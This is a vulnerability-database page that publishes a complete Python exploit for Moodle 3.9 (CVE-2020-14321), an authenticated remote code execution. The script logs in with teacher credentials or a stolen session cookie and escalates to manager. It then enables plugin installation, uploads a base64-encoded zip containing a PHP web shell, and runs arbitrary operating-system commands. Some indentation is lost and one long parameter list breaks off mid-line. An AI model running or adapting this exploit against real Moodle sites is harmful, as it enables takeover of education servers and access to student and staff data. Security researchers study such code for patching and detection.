Sunday, October 3, 2021

Moodle 3.9 Remote Code Execution

# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 12-05-2021
# Exploit Author: lanz
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.9
# Tested on: FreeBSD

#!/usr/bin/python3

## Moodle 3.9 - RCE (Authenticated as teacher)
## Based on PoC and Payload to assign full permissions to manager rol:
## * https://github.com/HoangKien1020/CVE-2020-14321

## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py

import string, random
import requests, re
import argparse
import base64
import signal
import time
from pwn import *

class Color:
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
END = '\033[0m'

def def_handler(sig, frame):
print(Color.RED + "\n[!] 3xIt1ngG...\n")
exit(1)

signal.signal(signal.SIGINT, def_handler)

banner = base64.b64decode("IF9fICAgICBfXyAgICAgX18gICBfXyAgX18gICBfXyAgICAgICAgICAgICAgX18gIF9fICAgICAKLyAgXCAgL3xfICBfXyAgIF8pIC8gIFwgIF8pIC8gIFwgX18gIC98IHxfX3wgIF8pICBfKSAvfCAKXF9fIFwvIHxfXyAgICAgL19fIFxfXy8gL19fIFxfXy8gICAgICB8ICAgIHwgX18pIC9fXyAgfCDigKIgYnkgbGFuegoKTW9vZGxlIDMuOSAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbiAoQXV0aGVudGljYXRlZCBhcyB0ZWFjaGVyKQpDb3Vyc2UgZW5yb2xtZW50cyBhbGxvd2VkIHByaXZpbGVnZSBlc2NhbGF0aW9uIGZyb20gdGVhY2hlciByb2xlIGludG8gbWFuYWdlciByb2xlIHRvIFJDRQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==").decode()

print(Color.BLUE + banner + Color.END)

def usagemybro():
fNombre = os.path.basename(__file__)
ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n'
ussage += '[+] Examples:\n'
ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n'
ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n"
return ussage

def arguments():
parse = argparse.ArgumentParser(usage=usagemybro())
parse.add_argument(dest='url', type=str, help='URL Moodle site')
parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz')
parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!')
parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25')
parse.add_argument('-idc', dest='id_course', type=str, default='5', help='Course ID valid to enrol yourself, default: 5')
parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami')
parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)')
return parse.parse_args()

def login(url, username, password, course_id, teacher_cookie):
'''
Sign in on site, with creds or with cookie
'''

p1 = log.progress("Login on site")

session = requests.Session()
r = session.get(url + '/login/index.php')

# Sign in with teacher cookie
if teacher_cookie != "":
p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END)
time.sleep(2)

# In case the URL format is: http://moodle.site.com/moodle
cookie_domain = url.split('/')[2] # moodle.site.com
cookie_path = "/%s/" % (url.split('/')[3]) # /moodle/
session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path)

r = session.get(url + '/user/index.php', params={"id":course_id})
try:
re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0]
except IndexError:
p1.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n")
exit(1)

id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END)
time.sleep(1)

# Sign in with teacher credentials
elif username and password != "":
p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END)
time.sleep(2)

login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0]

data_post = {
"anchor" : "",
"logintoken" : login_token,
"username" : username,
"password" : password
}

r = session.post(url + '/login/index.php', data=data_post)
if "Recently accessed courses" not in r.text:
p1.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nInvalid credentials.\n")
exit(1)

id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END)
time.sleep(1)

else:
print(Color.RED + "\nUse valid credentials or valid cookie\n")
exit(1)

return session, id_user, sess_key

def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command):
'''
Assign rol manager to teacher and manager account in the course.
'''

p4 = log.progress("Updating roles to move on manager accout")
time.sleep(1)

r = session.get(url + '/user/index.php', params={"id":course_id})
try:
teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0]
except IndexError:
p4.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n")
exit(1)

p4.status("Teacher " + Color.BLUE + teacher_user + Color.END)
time.sleep(1)

id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

session = update_rol(session, url, sess_key, course_id, id_user)
session = update_rol(session, url, sess_key, course_id, id_manager)

data_get = {
"id" : course_id,
"user" : id_manager,
"sesskey" : sess_key
}

r = session.get(url + '/course/loginas.php', params=data_get)
if "You are logged in as" not in r.text:
p4.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError trying to move on manager account. Validate credentials (or cookie).\n")
exit(1)

p4.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)

sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

# Updating rol manager to enable install plugins
session, sess_key = update_rol_manager(session, url, sess_key)

# Upload malicious zip file
zipb64_up(session, url, sess_key, teacher_user, course_id)

# RCE on system
moodle_RCE(url, command)

def update_rol(session, url, sess_key, course_id, id_user):
'''
Updating teacher rol to enable he update other users
'''

data_get = {
"mform_showmore_main" : "0",
"id" : course_id,
"action" : "enrol",
"enrolid" : "10",
"sesskey" : sess_key,
"_qf__enrol_manual_enrol_users_form" : "1",
"mform_showmore_id_main" : "0",
"userlist[]" : id_user,
"roletoassign" : "1",
"startdate" : "4",
"duration" : ""
}

r = session.get(url + '/enrol/manual/ajax.php', params=data_get)
return session

def update_rol_manager(session, url, sess_key):
'''
Updating rol manager to enable install plugins
* Extracted from: https://github.com/HoangKien1020/CVE-2020-14321
'''

p6 = log.progress("Updating rol manager to enable install plugins")
time.sleep(1)

data_get = {
"action":"edit",
"roleid":"1"
}

random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15))

# Headache part :P
data_post = [('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates'

r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post)

# Above we modify description field, so, if script find that description on site, we are good.
if random_desc not in r.text:
p6.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nTrouble updating fields\n")
exit(1)
else:
r = session.get(url + '/admin/search.php')
if "Install plugins" not in r.text:
p6.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.")
print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) Try again.\n")
exit(1)

sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

p6.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)

return session, sess_key

def zipb64_up(session, url, sess_key, teacher_user, course_id):
'''
Doing upload of zip file as base64 binary data
* https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/
'''

p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file")

r = session.get(url + '/admin/tool/installaddon/index.php')
zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0]
client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0]

# Upupup
data_get = {"action":"upload"}
data_post = {
"title" : "",
"author" : teacher_user,
"license" : "unknown",
"itemid" : [zipfile_id, zipfile_id],
"accepted_types[]" : [".zip",".zip"],
"repo_id" : course_id,
"p" : "",
"page" : "",
"env" : "filepicker",
"sesskey" : sess_key,
"client_id" : client_id,
"maxbytes" : "-1",
"areamaxbytes" : "-1",
"ctx_id" : "1",
"savepath" : "/"
}

zip_b64 = 'UEsDBAoAAAAAAOVa0VAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAACATtFQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAAB2bdFQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACAD4W9FQA9MUliAAAAAeAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsS/IKFAoriwuSc3VUIl3dw2JVk/OTVGP1bRWsLcDAFBLAwQUAAAACAB6bdFQtXxvb0EAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDM0NzCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAA5VrRUAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGAB/2bACX0TWAWRC9B9fRNYBhvTzH19E1gFQSwECHwAKAAAAAACATtFQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgArE3mRVJE1gGOG/QfX0TWAYb08x9fRNYBUEsBAh8ACgAAAAAAdm3RUAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAMIcIaZyRNYBwhwhpnJE1gGOG/QfX0TWAVBLAQIfABQAAAAIAPhb0VAD0xSWIAAAAB4AAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgA1t0sN2BE1gHW3Sw3YETWAfYt6i9fRNYBUEsBAh8AFAAAAAgAem3RULV8b29BAAAASQAAAA8AJAAAAAAAAAAgAAAAygAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAO6e2qlyRNYB7p7aqXJE1gFkQvQfX0TWAVBLBQYAAAAABQAFANsBAAA4AQAAAAA='
zip_file_bytes = zip_b64.encode('utf-8')
zip_file_b64 = base64.decodebytes(zip_file_bytes)

data_file = [
('repo_upload_file',
('rce.zip', zip_file_b64, 'application/zip'))]

r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file)
if "rce.zip" not in r.text:
p7.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError uploading zip file.\n")
exit(1)

# Trying to load file
data_post = {
"sesskey" : sess_key,
"_qf__tool_installaddon_installfromzip_form" : "1",
"mform_showmore_id_general" : "0",
"mform_isexpanded_id_general" : "1",
"zipfile" : zipfile_id,
"plugintype" : "",
"rootdir" : "",
"submitbutton" : "Install plugin from the ZIP file"
}

r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
if "Validation successful, installation can continue" not in r.text:
p7.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError uploading zip file, problems on plugin install.\n")
exit(1)

# Confirm load
zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0]
data_post = {
"installzipcomponent" : "block_rce",
"installzipstorage" : zip_storage,
"installzipconfirm" : "1",
"sesskey" : sess_key
}

r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
if "Current release information" not in r.text:
p7.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError uploading zip file, confirmation problems.\n")
exit(1)

p7.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)

return session

def moodle_RCE(url, command):
'''
Remote Command Execution on system with plugin installed (malicious zip file)
'''

p8 = log.progress("Executing " + Color.BLUE + command + Color.END)
time.sleep(1)

data_get = {"cmd" : command}

try:
r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3)
p8.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
print("\n" + Color.YELLOW + r.text + Color.END)
except requests.exceptions.Timeout as e:
p8.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
pass

print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END)

if __name__ == '__main__':
args = arguments()
session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie)
enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command)

 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore